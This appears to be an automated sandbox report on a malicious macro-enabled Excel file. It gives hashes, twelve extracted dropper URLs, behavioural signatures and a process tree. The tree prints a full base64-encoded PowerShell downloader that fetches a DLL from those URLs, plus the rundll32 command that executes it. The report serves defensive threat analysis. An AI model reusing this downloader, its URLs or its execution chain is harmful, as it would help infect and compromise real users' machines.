Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 23:18

General

  • Target

    9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a.xlsm

  • Size

    111KB

  • MD5

    9af3ba776016b60198602fd3e8dfbecd

  • SHA1

    9baf467e5414d0c931354a5bc83191a10d326272

  • SHA256

    9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a

  • SHA512

    116f81454daef37987fed2c699ff49a6a9063cc03c1cb08fb27fed06d0f115db82731c6b7eab61d363a62d3174faaa11b192f7b8f51e7e215a92804b1590cd9c

  • SSDEEP

    1536:PdsEIB9RRXF9OBD4o3C8VseP12QaGZKR3K87ftgfxSS66oXzOVZdIW5DET08:FJIB/p/s4LcRtaXR3KUtE4sYzOXPr8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://reumatismclinic.com/-/scCnm3mbJRpsaBKBbrC/

exe.dropper

https://shodhmanjari.com/wp-admin/xjEmK4Pd3N/

exe.dropper

http://tubelocal.net/wp-admin/X4Xm4Mk/

exe.dropper

https://pacifichomebroker.com/roderick/RRk/

exe.dropper

https://molinai-journal.com/wp-content/4HBv/

exe.dropper

https://marineboyrecords.com/font-awesome/QBBByHDDYl0slxlQ/

exe.dropper

https://mashuk.net/wp-includes/ej6R4fkU/

exe.dropper

https://lapalette.store/Fox-C404/Gngia6hD0i5zsgd2/

exe.dropper

https://jhonnycryptic.com/cgi-bin/OhZdKCDRBYGZudqs/

exe.dropper

https://korean911.com/wp-admin/TZczIsZtMFXxM5T/

exe.dropper

https://fonijuk.org/wp-content/fzq6vYFUMEiRoR8vG/

exe.dropper

https://baltoe.blog/-/6IC/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9234e88005c9e6f2d799b0c6a64edbe9c4f263f1af4d7e03d488927cffaf273a.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:868
    • C:\Windows\SYSTEM32\wscript.exe
      wscript c:\programdata\sduoixo.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnAD0AIgBoAHQAdABwADoALwAvAHIAZQB1AG0AYQB0AGkAcwBtAGMAbABpAG4AaQBjAC4AYwBvAG0ALwAtAC8AcwBjAEMAbgBtADMAbQBiAEoAUgBwAHMAYQBCAEsAQgBiAHIAQwAvACwAaAB0AHQAcABzADoALwAvAHMAaABvAGQAaABtAGEAbgBqAGEAcgBpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AGoARQBtAEsANABQAGQAMwBOAC8ALABoAHQAdABwADoALwAvAHQAdQBiAGUAbABvAGMAYQBsAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwBYADQAWABtADQATQBrAC8ALABoAHQAdABwAHMAOgAvAC8AcABhAGMAaQBmAGkAYwBoAG8AbQBlAGIAcgBvAGsAZQByAC4AYwBvAG0ALwByAG8AZABlAHIAaQBjAGsALwBSAFIAawAvACwAaAB0AHQAcABzADoALwAvAG0AbwBsAGkAbgBhAGkALQBqAG8AdQByAG4AYQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANABIAEIAdgAvACwAaAB0AHQAcABzADoALwAvAG0AYQByAGkAbgBlAGIAbwB5AHIAZQBjAG8AcgBkAHMALgBjAG8AbQAvAGYAbwBuAHQALQBhAHcAZQBzAG8AbQBlAC8AUQBCAEIAQgB5AEgARABEAFkAbAAwAHMAbAB4AGwAUQAvACwAaAB0AHQAcABzADoALwAvAG0AYQBzAGgAdQBrAC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBlAGoANgBSADQAZgBrAFUALwAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAcABhAGwAZQB0AHQAZQAuAHMAdABvAHIAZQAvAEYAbwB4AC0AQwA0ADAANAAvAEcAbgBnAGkAYQA2AGgARAAwAGkANQB6AHMAZwBkADIALwAsAGgAdAB0AHAAcwA6AC8ALwBqAGgAbwBuAG4AeQBjAHIAeQBwAHQAaQBjAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATwBoAFoAZABLAEMARABSAEIAWQBHAFoAdQBkAHEAcwAvACwAaAB0AHQAcABzADoALwAvAGsAbwByAGUAYQBuADkAMQAxAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBUAFoAYwB6AEkAcwBaAHQATQBGAFgAeABNADUAVAAvACwAaAB0AHQAcABzADoALwAvAGYAbwBuAGkAagB1AGsALgBvAHIAZwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBmAHoAcQA2AHYAWQBGAFUATQBFAGkAUgBvAFIAOAB2AEcALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGEAbAB0AG8AZQAuAGIAbABvAGcALwAtAC8ANgBJAEMALwAiAC4AcwBwAEwAaQBUACgAIgAsACIAKQA7AGYATwByAGUAYQBDAGgAKAAkAGoAZAB0AEYASgBkAFgAaAByADYAdAB4AHkAaABkACAAaQBuACAAJABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnACkAewAkAHIAaAB5AGsAYQBqAGQAaABmAHMANwBpAGQAZgBnAGQAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAHYAYgBrAHcAawAuAGQAbABsACIAOwBpAE4AdgBPAGsAZQAtAHcARQBiAHIAZQBRAHUAZQBzAFQAIAAtAHUAUgBpACAAJABqAGQAdABGAEoAZABYAGgAcgA2AHQAeAB5AGgAZAAgAC0AbwB1AFQAZgBpAEwAZQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJAByAGgAeQBrAGEAagBkAGgAZgBzADcAaQBkAGYAZwBkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADQANQAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4224
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4908
        • \??\c:\windows\syswow64\rundll32.exe
          c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5104

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fvc04o5v.sh2.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    26528ca4757fa6e282c52ef3ea317a4c

    SHA1

    4fa2111555de242e5513897b7bd666c40d2fdd59

    SHA256

    9fae0f70d7e720ef7844f6cf5830b11785935e0d0ccbeb1208157357ad2a7542

    SHA512

    bf76af85f0535620ec99972281f59e658112ca20f883f8a342907ea948aeefef37a8baff2278fcbdf5361d8d5e970a9576efa385ec6487101e96eeebcacd6af5

  • C:\programdata\jledshf.bat

    Filesize

    3KB

    MD5

    016baa9173d80a2783f51e289ba3446c

    SHA1

    3207efbfaf61e29d86c969245008aad1fa7f9657

    SHA256

    24cc34c301ca2213382e1be7fb5241073d6e23b390ba1b2c6fa76faa5ca5d3b4

    SHA512

    39b79426561f73777b5f2e8349052c994329ebdbc123261123f3234291ffe4741fc6275438d092e7a449899becac30e4b2e899f9fd45c3ff1685e604a6ebf651

  • \??\c:\programdata\sduoixo.vbs

    Filesize

    561B

    MD5

    87a9c41dc3e67b9b0b6cdb367d4858bd

    SHA1

    00f117f9a02dad3c127b2c607ead43300c2bebbe

    SHA256

    f0b09a17f07b03b8cfe1969f84fcfb96933439707fa86ba8aa79181145512e18

    SHA512

    7373ca3127a1baf85e3cc6beb7b046788132b1bb388405657cb924435386d186a2645971128dc582a970242c4a3dfdc7fcce78ed158b0d430c96bbd18686f1dd

  • \??\c:\programdata\vbkwk.dll

    Filesize

    1KB

    MD5

    b31e43a162e56d32cfff6af0122284f1

    SHA1

    c9a6a56cc9255666ebe9c46a123a4c0b2bb588a1

    SHA256

    1c4c11ccd1cd2b2fccff4db7bdb90908cdfb395573d791540815dcea5ccdc80b

    SHA512

    ea8280e5236fee0a2ad494095d493be210135cb98e899add64d43bf142cbc0287dda4e5b302745a867d40c0f7f846033929ac3c2fadc5ce3a061517091cbbbf2

  • memory/868-19-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-32-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-7-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-6-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-11-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-10-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-9-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-14-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-13-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-15-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

    Filesize

    64KB

  • memory/868-12-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-16-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-17-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

    Filesize

    64KB

  • memory/868-2-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/868-18-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-20-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-31-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-8-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-76-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-54-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-0-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/868-5-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/868-1-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

    Filesize

    4KB

  • memory/868-4-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/868-3-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

    Filesize

    64KB

  • memory/868-148-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-149-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

    Filesize

    4KB

  • memory/868-150-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-151-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-152-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-156-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/868-157-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

    Filesize

    2.0MB

  • memory/4224-146-0x000001F12FA30000-0x000001F1301D6000-memory.dmp

    Filesize

    7.6MB

  • memory/4224-137-0x000001F12ED80000-0x000001F12EDA2000-memory.dmp

    Filesize

    136KB